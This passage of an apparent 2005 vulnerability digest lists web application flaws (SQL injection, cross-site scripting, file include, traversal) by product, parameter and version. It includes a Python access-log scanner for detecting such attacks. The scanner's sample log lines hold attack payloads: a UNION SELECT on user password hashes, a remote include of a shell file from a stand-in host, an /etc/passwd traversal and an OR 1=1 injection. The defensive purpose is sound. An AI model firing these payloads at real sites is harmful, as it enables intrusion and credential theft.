  • Description: OTRS is the Open-source Ticket Request System written in Perl. It is prone to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input. These issues affect the "User" parameter of the "Login" function and the "TicketID" and "ArticleID" parameters of the "AgentTicketPlain" function. OTRS versions 2.0.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15537/exploit

  • 05.48.46 - CVE: Not Available
  • Platform: Web Application
  • Title: Virtual Hosting Control System Error Message Cross-Site Scripting
  • Description: Virtual Hosting Control System is a web-based control panel for Web server management. It is prone to cross-site scripting attacks. The vulnerability affects the "vhcs/gui/errordocs/index.php" script when error messages are rendered. Versions 2.2 and 2.4.6 of the software are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417433

  • 05.48.47 - CVE: Not Available
  • Platform: Web Application
  • Title: PmWiki Search Cross-Site Scripting
  • Description: PmWiki is a web-based wiki application written in PHP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "q" parameter of the "Search" function. PmWiki versions 2.0 up to and including 2.0.12 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15539

  • 05.48.48 - CVE: Not Available
  • Platform: Web Application
  • Title: Torrential Getdox.PHP Cross-Site Scripting
  • Description: Torrential is a tracking application for BitTorrent. It is prone to a cross-site scripting issue due to a failure in the application to properly sanitize user-supplied input to the "getdox.php" script. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. Torrential version 1.2 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15543/info

  • 05.48.49 - CVE: Not Available
  • Platform: Web Application
  • Title: NetObjects Fusion 9 Information Disclosure
  • Description: NetObjects Fusion 9 is an application that is used to create and manage Websites. It is vulnerable to an information disclosure issue which may allow remote attackers to disclose authentication credentials and all content, resulting in a complete compromise. This issue affects any site using NetObjects Fusion 9 and nPower.
  • Ref: http://www.schneier.com/blog/archives/2005/11/possible_net_ob.html

  • 05.48.50 - CVE: Not Available
  • Platform: Web Application
  • Title: AFFCommerce Multiple SQL Injection Vulnerabilities
  • Description: AFFCommerce Shopping Cart is a shopping cart application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "cl" parameter of the "SubCategory.php" script and the "item_id" parameter of the "ItemInfo.php" and "ItemReview.php" scripts. AFFCommerce Shopping Cart versions 1.1.4 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/affcommerce-multiple-sql-inj.html

  • 05.48.51 - CVE: Not Available
  • Platform: Web Application
  • Title: Easybe 1-2-3 Music Store Process.PHP SQL Injection
  • Description: Easybe 1-2-3 Music Store is a web application designed to help an individual to sell music online. 1-2-3 Music Store is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "AlbumID" parameter of the "process.php" script before using it in an SQL query. Easybe 1-2-3 Music Store version 1.0 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15544/exploit

  • 05.48.52 - CVE: Not Available
  • Platform: Web Application
  • Title: kPlaylist Search Cross-Site Scripting
  • Description: kPlaylist is a web application for displaying and serving music files. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "searchfor" parameter of the search function. kPlaylist version 1.6 Build 411 and Build 400 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15546

  • 05.48.53 - CVE: Not Available
  • Platform: Web Application
  • Title: WSN Forum Memberlist.PHP SQL Injection
  • Description: WSN Forum is a web-based forum application. Insufficient sanitization of the "id" parameter in the "memberlist.php" script exposes the application to an SQL injection issue. WSN Forum version 1.21 is affected.
  • Ref: http://www.securityfocus.com/bid/15549

  • 05.48.54 - CVE: Not Available
  • Platform: Web Application
  • Title: OmnistarLive Multiple SQL Injection
  • Description: OmnistarLive is a suite of tools for managing an online business. It is prone to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input to the "id" and "category_id" parameters of the "kb.php" script. OmnistarLive versions 5.2 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/omnistar-live-id-and-categoryid-sql.html

  • 05.48.55 - CVE: Not Available
  • Platform: Web Application
  • Title: CommodityRentals SQL Injection
  • Description: CommodityRentals is a Web based e-commerce application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "user_id" parameter of the "usersession.php" script before using it in an SQL query. CommodityRentals version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15552/exploit

  • 05.48.56 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP Labs Survey Wizard SQL Injection
  • Description: PHP Labs Survey Wizard is a Web survey application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "sid" parameter of the "survey.php" script. All versions of PHP Labs Survey Wizard are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/survey-wizard-sid-sql-injection-vuln.html

  • 05.48.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Ezyhelpdesk Multiple SQL Injection Vulnerabilities
  • Description: Ezyhelpdesk is a web-based helpdesk application. It is prone to multiple SQL injection vulnerabilities due to improper sanitization of user-supplied input to the "search_string" parameter in the ticket search form, and the "faq_id", "edit_id" and "c_id" parameters of the "/help/index.php" script. Ezyhelpdesk version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15553/exploit

  • 05.48.58 - CVE: CVE-2005-2253
  • Platform: Web Application
  • Title: PHP Labs Top Auction Multiple SQL Injection Vulnerabilities
  • Description: PHP Labs Top Auction is a web-based auction site written in PHP. PHP Labs Top Auction is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to various scripts.
  • Ref: http://pridels.blogspot.com/2005/11/top-auction-multiple-sql-vuln.html

  • 05.48.59 - CVE: Not Available
  • Platform: Web Application
  • Title: blogBuddies Multiple Cross-Site Scripting Vulnerabilities
  • Description: blogBuddies is an RSS and Atom feed gathering application. Insufficient sanitization of user-supplied input exposes the application to multiple cross-site scripting issues. blogBuddies version 0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/15549

  • 05.48.60 - CVE: Not Available
  • Platform: Web Application
  • Title: FreeForum Multiple SQL Injection Vulnerabilities
  • Description: FreeForum is a web-based bulletin board. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input before using it in SQL queries. Specifically, these issues affect the "cat" and "thread" parameters of the "forum.php" script. FreeForum versions 1.1 and prior are reportedly affected.
  • Ref: http://www.securityfocus.com/bid/15559/exploit

  • 05.48.61 - CVE: Not Available
  • Platform: Web Application
  • Title: SCSSBoard Search Module Cross-Site Scripting Vulnerabilities
  • Description: SCssBoard is a web forum application. It is prone to a cross-site scripting vulnerability due to improper sanitization of user-supplied input to the "search_term" parameter of the "Search" page. SCssBoard versions 1.12 and earlier are reported to be vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/scssboard-xss-vuln-in-search-param.html

  • 05.48.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
  • Description: Softbiz Web Host Directory Script is an advanced PHP script to run your own web host comparison site. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. SoftBiz Web Hosting Directory Script versions 1.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15561

  • 05.48.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Comdev Vote Caster Index.PHP SQL Injection
  • Description: Comdev Vote Caster is a web-based voting application. Insufficient sanitization of the "campaign_id" parameter in the "index.php" script exposes the application to a SQL injection issue. Comdev Vote Caster version 3.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15563

  • 05.48.64 - CVE: Not Available
  • Platform: Web Application
  • Title: SupportPro SupportDesk Multiple Cross-Site Scripting Vulnerabilities
  • Description: SupportPro SupportDesk is a web-based help desk. It is prone to multiple cross-site scripting vulnerabilities due to a failure in the application to properly sanitize user-supplied input to the "post" and "view" tickets parameters. An attacker may leverage this issue to steal cookie based authentication and perform other attacks. All current versions are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/supportpro-supportdesk-xss-vuln.html

  • 05.48.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Orca Forum Forum.PHP SQL Injection
  • Description: Orca Forum is web-based forum software. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "msg" parameter of the "forum.php" script before using it in an SQL query. Orca Forum version 4.3 is affected.
  • Ref: http://pridels.blogspot.com/2005/11/orca-forum-43x-msg-sql-inj.html

  • 05.48.66 - CVE: Not Available
  • Platform: Web Application
  • Title: OvBB Multiple SQL Injection Vulnerabilities
  • Description: OvBB is a web-based bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "userid" parameter of the "profile.php" script and the "threadid" parameter of the "thread.php" script. OvBB versions 0.08a and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/ovbb-sql-vulnerabilities.html

  • 05.48.67 - CVE: Not Available
  • Platform: Web Application
  • Title: OrbitScripts SmartPPC Pro Username Parameter Cross-Site Scripting
  • Description: SmartPPC Pro is a PPC search engine implemented in PHP. SmartPPC Pro is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "username" parameter of the "directory.php", "frames.php", and "search.php" scripts.
  • Ref: http://www.securityfocus.com/bid/15567

  • 05.48.68 - CVE: Not Available
  • Platform: Web Application
  • Title: vtiger CRM Multiple Input Validation Vulnerabilities
  • Description: vtiger is a customer relationship management system. It is prone to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. vtiger CRM version 4.2 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15569

  • 05.48.69 - CVE: Not Available
  • Platform: Web Application
  • Title: eFiction Multiple Input Validation Vulnerabilities
  • Description: eFiction is a fan fiction archive application. Insufficient sanitization of user-supplied input exposes the application to multiple input validation issues. eFiction versions 1.0, 1.1 and 2.0 are affected.
  • Ref: http://www.securityfocus.com/bid/15568

  • 05.48.70 - CVE: Not Available
  • Platform: Web Application
  • Title: IsolSoft Support Center Multiple SQL Injection
  • Description: Support Center is an automated help desk system. It is prone to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input. A remote attacker could exploit these issues to compromise the application. Support Center versions 2.2 and earlier are affected.
  • Ref: http://pridels.blogspot.com/2005/11/isolsoft-support-center-sql-inj.html

  • 05.48.71 - CVE: CVE-2005-3827
  • Platform: Web Application
  • Title: AgileBill Product_Cat SQL Injection
  • Description: AgileBill is an account management application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id" parameter of the "product_cat" page. AgileBill versions 1.4.92 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/agilebill-14x-id-sql-injection.html

  • 05.48.72 - CVE: Not Available
  • Platform: Web Application
  • Title: PBLang Bulletin Board System Multiple HTML Injection Vulnerabilities
  • Description: PBLang is a bulletin board system. PBLang is prone to multiple HTML injection vulnerabilities due to improper sanitization of user-supplied input before using it in dynamically generated content. Multiple fields in the "profile.php" and "ucp.php" scripts are improperly sanitized. PBLang version 4.65 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15573/exploit

  • 05.48.73 - CVE: CVE-2005-3860
  • Platform: Web Application
  • Title: Athena PHP Website Administration Remote File Include
  • Description: Athena PHP Website Administration is a PHP Web application that utilizes a MySQL database to store site content. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "athena_dir" parameter of the "athena.php" script. Athena PHP Website Administration version 0.1a is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417796

  • 05.48.74 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPGreetz Remote File Include
  • Description: phpGreetz is a freely available, open source greeting card package. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "content" parameter of the "content.php" script. phpGreetz version 0.99 is affected.
  • Ref: http://www.securityfocus.com/archive/1/417798

  • 05.48.75 - CVE: Not Available
  • Platform: Web Application
  • Title: Q-News Remote File Include Vulnerability
  • Description: Q-News is a Quick News generator. Insufficient sanitization of the "id" parameter in the "q-news.php" script exposes the application to a remote file include issue. Q-News version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15576

  • 05.48.76 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPWordPress Multiple SQL Injection
  • Description: PHPWordPress is a news article management application. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "poll", "category" and "ctg" parameters of the "index.php" script. PHPWordPress versions 3.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/phpwordpress-30-sql-inj.html

  • 05.48.77 - CVE: Not Available
  • Platform: Web Application
  • Title: Nicecoder iDesk FAQ.PHP SQL Injection
  • Description: Nicecoder iDesk is a web based customer support application. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "cat_id" parameter of the "faq.php" script before using it in an SQL query. Nicecoder iDesk version 1.0 is reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/idesk-catid-sql-inj.html

  • 05.48.78 - CVE: CVE-2005-3884
  • Platform: Web Application
  • Title: Zainu SQL Injection Vulnerabilities
  • Description: Zainu is a web-based music video site creation application. Zainu is prone to SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. Zainu version 2.0 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html

  • 05.48.79 - CVE: Not Available
  • Platform: Web Application
  • Title: Babe Logger SQL Injection Vulnerabilities
  • Description: Babe Logger is a content management application. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "gal" parameter of the "index.php" script and the "id" parameter of the "comments.php" script.
  • Ref: http://www.securityfocus.com/bid/15580

  • 05.48.80 - CVE: Not Available
  • Platform: Web Application
  • Title: PDJK-support Suite Multiple SQL Injection Vulnerabilities
  • Description: PDJK-support Suite is a help desk and software support application. Insufficient sanitization of user-supplied input exposes the application to multiple SQL injection issues. PDJK-support retail version 1.1a is affected.
  • Ref: http://www.securityfocus.com/bid/15598

  • 05.48.81 - CVE: Not Available
  • Platform: Web Application
  • Title: Top Music Module SQL Injection
  • Description: Top Music Module is a third-party module for PHP-Nuke. It is prone to an SQL injection vulnerability due to a failure in the module to properly sanitize user-supplied input to the "idartist", "idsong" and "idalbum" parameters. A remote attacker could exploit this issue to compromise the application.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html

  • 05.48.82 - CVE: Not Available
  • Platform: Web Application
  • Title: Bedeng PSP SQL Injection Vulnerabilities
  • Description: Bedeng PSP is a Web portal application. It is prone to SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "ckode" parameter in "baca.php", "a.ngroup" parameter in "download.php", and "a.nsub" parameter in "index.php". Bedeng PSP version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15583

  • 05.48.83 - CVE: Not Available
  • Platform: Web Application
  • Title: Nephp Publisher SQL Injection
  • Description: Nelogic Nephp Publisher is a Web publishing application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id" and "nnet_catid" parameters of the "index.php" script. Nelogic Nephp Publisher version 4.5.2 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html

  • 05.48.84 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz Resource Repository Script Multiple SQL Injection Vulnerabilities
  • Description: Softbiz Resource Repository Script is a web-based resource directory and advertising platform. It is prone to SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "sbres_id" parameter of the "details_res.php", "refer_friend.php" and "report_link.php" scripts and the "sbcat_id" parameter of the "showcats.php" script before using it in an SQL query. Softbiz Resource Repository Script version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15585/exploit

  • 05.48.85 - CVE: Not Available
  • Platform: Web Application
  • Title: BerliOS SourceWell SQL Injection
  • Description: BerliOS SourceWell is a web-based software repository application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "cnt" parameter of the "index.php" script. BerliOS SourceWell version 1.1.3 is affected.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html

  • 05.48.86 - CVE: Not Available
  • Platform: Web Application
  • Title: AllWeb Search SQL Injection
  • Description: AllWeb Search is a web-based search application. Insufficient sanitization of the "search" parameter of the "index.php" script exposes the application to an SQL injection issue. AllWeb Search version 3.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15587

  • 05.48.87 - CVE: Not Available
  • Platform: Web Application
  • Title: K-Search SQL Injection
  • Description: K-Search is a meta-search application. It is vulnerable to an SQL injection issue due to a failure in the application to properly sanitize user-supplied input. A remote attacker could exploit this issue to compromise the application. K-Search version 1.0 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html

  • 05.48.88 - CVE: CVE-2005-3871
  • Platform: Web Application
  • Title: JBB Multiple SQL Injection Vulnerabilities
  • Description: JBB is a web-based bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "nr" parameter in "topiczeigen.php", the "forum" and "zeigeseite" parameters in "showforum.php", the "forum" parameter in "newtopic.php", and the "tidnr" parameter in the "neuerbeitrag.php" script. JBB version 0.9.9 rc3 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/jbb-sql-inj-vuln.html

  • 05.48.89 - CVE: Not Available
  • Platform: Web Application
  • Title: UGroup SQL Injection Vulnerabilities
  • Description: UGroup is a Web-based discussion forum application. It is prone to SQL injection vulnerabilities due to a failure in the application to properly sanitize user-supplied input to the "FORUM_ID" parameter in "forum.php", and the "CAT_ID", "FORUM_ID" and "TOPIC_ID" parameters in "topic.php", before using them in SQL queries. UGroup version 2.6.2 is affected.
  • Ref: http://www.securityfocus.com/bid/15591/exploit

  • 05.48.90 - CVE: Not Available
  • Platform: Web Application
  • Title: ShockBoard Offset Parameter SQL Injection
  • Description: ShockBoard is a web-based bulletin board application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "offset" parameter of the "topic.php" script. ShockBoard versions 4.0 and 3.0 are affected.
  • Ref: http://www.securityfocus.com/bid/15592

  • 05.48.91 - CVE: Not Available
  • Platform: Web Application
  • Title: SimpleBBS Search Module Parameters SQL Injection
  • Description: SimpleBBS is a web-based bulletin board system application. Insufficient sanitization of user-supplied input exposes the application to an SQL injection issue. SimpleBBS version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15594

  • 05.48.92 - CVE: Not Available
  • Platform: Web Application
  • Title: Helpdesk Issue Manager Multiple SQL Injection Vulnerabilities
  • Description: Helpdesk Issue Manager is a web-based help desk application. It is vulnerable to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. An attacker could exploit this issue to compromise the application. Helpdesk Issue Manager versions 0.9 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/helpdesk-issue-manager-v09-sql-inj.html

  • 05.48.93 - CVE: CVE-2005-3876
  • Platform: Web Application
  • Title: ADC2000 NG Pro SQL Injection
  • Description: ADC2000 NG Pro is a Web-based banner exchange application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "lang" and "cat" parameters of the "adcbrowres.php" script. ADC2000 NG Pro version 1.2 and NG Pro lite are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/adc2000-ng-pro-sql-inj-vuln.html

  • 05.48.94 - CVE: Not Available
  • Platform: Web Application
  • Title: Simple Document Management System Multiple SQL Injection Vulnerabilities
  • Description: Simple Document Management System (SDMS) is a web-based content management system. SDMS is prone to SQL injection vulnerabilities. These issues are due to improper sanitization of user-supplied input to the "folder_id" parameter in "list.php" and "mid" parameter in "messages.php" before using them in an SQL query. SDMS version 2.0-CVS is reported to be affected.
  • Ref: http://www.securityfocus.com/bid/15596/exploit

  • 05.48.95 - CVE: CVE-2005-3851
  • Platform: Web Application
  • Title: OASYS Lite Search.ASP Cross-Site Scripting
  • Description: OASYS Lite is an online attendance system implemented in ASP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "keyword" parameter of the "search.asp" script. OASYS Lite versions 1.0 and earlier are affected.
  • Ref: http://pridels.blogspot.com/2005/11/oasys-lite-10-searchasp-xss-vuln.html

  • 05.48.96 - CVE: Not Available
  • Platform: Web Application
  • Title: OKBSYS Lite Search.ASP Cross-Site Scripting
  • Description: OKBSYS Lite is an online knowledge base system implemented in ASP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "q" parameter of the "search.asp" script. OKBSYS Lite versions 1.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15607

  • 05.48.97 - CVE: Not Available
  • Platform: Web Application
  • Title: WebCalendar Multiple SQL Injection Vulnerabilities
  • Description: WebCalendar is a web-based calendar application. Insufficient sanitization of user-supplied input exposes the application to multiple SQL injection issues. WebCalendar version 1.0.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15606

  • 05.48.98 - CVE: Not Available
  • Platform: Web Application
  • Title: Randshop Multiple SQL Injection Vulnerabilities
  • Description: Randshop is a shopping cart application. It is vulnerable to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input. An attacker could exploit these issues to compromise the application. All current versions of Randshop are affected.
  • Ref: http://www.securityfocus.com/archive/1/417896

  • 05.48.99 - CVE: Not Available
  • Platform: Web Application
  • Title: WebCalendar Export_Handler.PHP File Corruption
  • Description: WebCalendar is a calendar application. It is vulnerable to a file corruption issue due to insufficient sanitization of the "id" and "format" parameters of the "export_handler.php" script. WebCalendar version 1.0.1 is vulnerable.
  • Ref: http://www.ush.it/2005/11/28/webcalendar-multiple-vulnerabilities

  • 05.48.100 - CVE: Not Available
  • Platform: Web Application
  • Title: GuppY Multiple Local File Include and Information Disclosure Vulnerabilities
  • Description: GuppY is web portal software. It is affected by multiple local file include and information disclosure vulnerabilities. These issues are due to improper sanitization of user-supplied input. The problems present themselves specifically when an attacker passes the location of a potentially malicious local script through the "lng" parameter of the "archbatch.php", "nwlmail.php" and "dbbatch.php" scripts. GuppY versions 4.5.9 and prior are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417899

  • 05.48.101 - CVE: CVE-2005-3878
  • Platform: Web Application
  • Title: PHP Doc System Local File Include
  • Description: PHP Doc System is a web-based documentation application written in PHP. It is prone to a file include vulnerability which may allow for arbitrary code execution and information disclosure. PHP Doc System versions 1.5.1 and prior are reported to be vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/php-doc-system-151-local-file.html

  • 05.48.102 - CVE: Not Available
  • Platform: Web Application
  • Title: SearchSolutions Multiple Products Cross-Site Scripting Vulnerabilities
  • Description: SearchSolutions SearchFeed, RevenuePilot and Google API are search-related applications. Insufficient sanitization of user-supplied input exposes the application to multiple cross-site scripting issues. Please check the advisory below for a list of affected versions.
  • Ref: http://www.securityfocus.com/bid/15612

  • 05.48.103 - CVE: Not Available
  • Platform: Web Application
  • Title: Gallery Unspecified Security Vulnerability
  • Description: Gallery is a photo gallery application. It is prone to an unspecified security vulnerability. The vendor has not provided any further information about the issue, however, it is believed that the issue is remotely exploitable due to the nature of the application. The vendor has released version 2.0.2 to address the issue.
  • Ref: http://gallery.menalto.com/

  • 05.48.104 - CVE: Not Available
  • Platform: Web Application
  • Title: ASP-Rider Default.ASP SQL Injection
  • Description: ASP-Rider is a web log application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the HTTP request header of the "default.asp" script before using it in an SQL query. ASP-Rider version 1.6 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15617/exploit
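Most of the issues in this list leave the same footprint in a web server's access log: a quote or UNION in a parameter that should be a number, a URL in a parameter that names an include, or "../" and a NUL byte in a parameter that names a file. The following is an added detection example, not code from SANS, Qualys or any vendor listed here: it scans Apache combined-format lines and classifies parameter values by the type the parameter is supposed to have. The log lines, hosts and paths are constructed for the demonstration, and the parameter-to-type mapping is an assumption that has to be adapted per application. The ASP-Rider entry above is the caveat: its payload travels in a request header, which a standard access log never records, so this scanner cannot see it.

```python
"""
Added example, not from SANS, Qualys or any vendor in this list: a scanner
that flags the probe patterns behind these entries (quote/UNION payloads in
id parameters, URLs in include parameters, ../ and NUL in path parameters)
in Apache combined-format access logs. Log lines, hosts and paths are
constructed; the parameter-to-type mapping is an assumption to adapt per app.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# What each watched parameter should look like, taken from the entries in
# this list. The same name can mean different things in different apps.
NUMERIC = {"AlbumID", "id", "user_id", "sid", "cat", "thread", "campaign_id",
           "userid", "threadid", "offset", "SURVEY_ID"}
TEXT = {"searchfor", "search", "search_term", "query", "keyword", "q"}
PATH = {"athena_dir", "content", "module", "lng", "cmd", "var1"}

SQLI_TEXT = re.compile(r"(?i)(\bunion\b[\s\S]*\bselect\b"
                       r"|\b(or|and)\b\s+\S+\s*=\s*\S+"
                       r"|'\s*--|;\s*--)")
RFI = re.compile(r"(?i)^\s*(https?|ftp|php|data):")
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|\x00)")


def classify(name, value):
    """Return 'sqli', 'rfi', 'traversal' or None for one decoded parameter."""
    v = unquote_plus(value)   # second pass catches %2527-style double encoding
    if name in PATH:
        if RFI.search(v):
            return "rfi"
        if TRAVERSAL.search(v):
            return "traversal"
    elif name in NUMERIC:
        # An id that is not an integer is attacker-shaped whatever it contains.
        if v.strip() and not re.fullmatch(r"-?\d+", v.strip()):
            return "sqli"
    elif name in TEXT:
        # Free text legitimately contains quotes (rock'n'roll), so look for
        # SQL structure rather than a lone apostrophe.
        if SQLI_TEXT.search(v):
            return "sqli"
    return None


def scan(lines):
    """Return a list of (client ip, path, parameter, kind) for suspicious values."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify(name, value)
            if kind:
                hits.append((m.group("ip"), parts.path, name, kind))
    return hits


# Constructed log lines (RFC 5737 addresses). The last one stands in for an
# ASP-Rider-style request: its payload sits in a header the log never records.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Nov/2005:10:12:01 +0000] "GET /store/process.php?AlbumID=15 HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [28/Nov/2005:10:12:05 +0000] "GET /store/process.php?AlbumID=15%20UNION%20SELECT%20login,pw_hash,3%20FROM%20users HTTP/1.0" 200 7011 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [28/Nov/2005:10:13:40 +0000] "GET /athena.php?athena_dir=http://203.0.113.9/shell.txt? HTTP/1.0" 200 1200 "-" "-"',
    '198.51.100.4 - - [28/Nov/2005:10:14:02 +0000] "GET /index.php?module=../../../../etc/passwd%00 HTTP/1.0" 404 300 "-" "-"',
    '192.0.2.22 - - [28/Nov/2005:10:15:00 +0000] "GET /search.php?searchfor=rock%27n%27roll HTTP/1.0" 200 3000 "-" "-"',
    '192.0.2.22 - - [28/Nov/2005:10:15:09 +0000] "GET /search.php?searchfor=%27%20OR%201%3D1-- HTTP/1.0" 200 9800 "-" "-"',
    '192.0.2.22 - - [28/Nov/2005:10:15:30 +0000] "GET /default.asp HTTP/1.0" 200 2400 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Typing the parameters is what keeps the noise down: a numeric id needs no signature list at all, while the free-text patterns still deserve tuning against your own traffic. Also note the 200 status on the UNION request; a successful probe looks like an ordinary page view unless you inspect the parameters.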

  • 05.48.105 - CVE: CVE-2005-3846
  • Platform: Web Application
  • Title: Fantastic Scripts Fantastic News News.PHP SQL Injection
  • Description: Fantastic News is a news management script written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "category" parameter of the "news.php" script. Fantastic News versions 2.1.1 and earlier are affected.
  • Ref: http://pridels.blogspot.com/2005/11/fantastic-news-category-sql-inj.html

  • 05.48.106 - CVE: Not Available
  • Platform: Web Application
  • Title: Xaraya Directory Traversal
  • Description: Xaraya is a web application framework implemented in PHP. It is prone to a directory traversal vulnerability due to an access validation error. Reports indicate that an attacker can supply directory traversal sequences followed by a file name and a null character through the "module" parameter of the "index.php" script to place files in arbitrary locations. Xaraya versions 1.0.0 RC4 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15623

  • 05.48.107 - CVE: Not Available
  • Platform: Web Application
  • Title: DMANews Multiple SQL Injection Vulnerabilities
  • Description: DMANews is a web-based news management application. Insufficient sanitization of the "id", "sortorder", and "display_num" parameters in the "index.php" script exposes the application to multiple SQL injection issues. DMANews versions 0.904 and 0.910 are affected.
  • Ref: http://www.securityfocus.com/bid/15628

  • 05.48.108 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP Upload Center Directory Traversal
  • Description: PHP Upload Center is a web-based application. It is vulnerable to a directory traversal issue due to a failure in the application to properly sanitize user-supplied input. A remote attacker may exploit this vulnerability to reveal files that contain potentially sensitive information. All current versions of PHP Upload Center are vulnerable.
  • Ref: http://liz0.3yr.net/phpuploadcenter.txt

  • 05.48.109 - CVE: Not Available
  • Platform: Web Application
  • Title: DRZES HMS Register_domain.PHP Cross-Site Scripting
  • Description: DRZES HMS is a Web hosting and account management application. It is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. DRZES HMS versions 3.2 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/drzes-hms-32-multiple-vuln.html

  • 05.48.110 - CVE: Not Available
  • Platform: Web Application
  • Title: DRZES HMS Multiple SQL Injection Vulnerabilities
